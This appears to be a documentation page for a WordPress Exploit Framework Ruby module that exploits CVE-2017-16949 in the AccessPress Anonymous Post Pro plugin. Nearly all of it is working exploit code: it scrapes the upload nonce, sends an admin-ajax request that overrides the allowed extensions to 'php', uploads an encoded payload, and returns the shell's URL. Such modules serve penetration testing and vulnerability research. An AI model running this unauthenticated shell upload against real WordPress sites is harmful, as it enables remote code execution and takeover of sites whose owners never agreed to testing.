class Wpxf::Exploit::AccessPressAnonymousPostProShellUpload

Attributes

upload_nonce[RW]

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'AccessPress Anonymous Post Pro < 3.2.0 Unauthenticated Shell Upload',
    author: [
      'Colette Chamberland', # Disclosure
      'rastating'            # WPXF module
    ],
    references: [
      ['WPVDB', '8977'],
      ['CVE', '2017-16949']
    ],
    date: 'Dec 19 2017'
  )
end

Public Instance Methods

before_upload() click to toggle source
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 27
def before_upload
  emit_info 'Acquiring upload nonce...'
  res = execute_get_request(url: full_uri)
  return false unless res&.code == 200

  pattern = /var\sap_fileuploader\s=\s{.+?,"nonce":"([a-zA-Z0-9]+?)"};/i
  self.upload_nonce = res.body[pattern, 1]

  if upload_nonce.nil?
    emit_error 'Failed to acquire upload nonce'
    return false
  else
    emit_success "Acquired upload nonce: #{upload_nonce}", true
    return true
  end
end
check() click to toggle source
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 23
def check
  :unknown
end
payload_body_builder() click to toggle source
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 57
def payload_body_builder
  builder = Utility::BodyBuilder.new
  builder.add_file_from_string('qqfile', payload.encoded, payload_name)
  builder
end
upload_request_params() click to toggle source
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 48
def upload_request_params
  {
    'action' => 'ap_file_upload_action',
    'file_uploader_nonce' => upload_nonce,
    'allowedExtensions[]' => 'php',
    'sizeLimit' => '6400'
  }
end
uploaded_payload_location() click to toggle source
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 63
def uploaded_payload_location
  return nil if upload_result&.body.nil?

  res = JSON.parse(upload_result.body)
  res['url']
end
uploader_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 44
def uploader_url
  wordpress_url_admin_ajax
end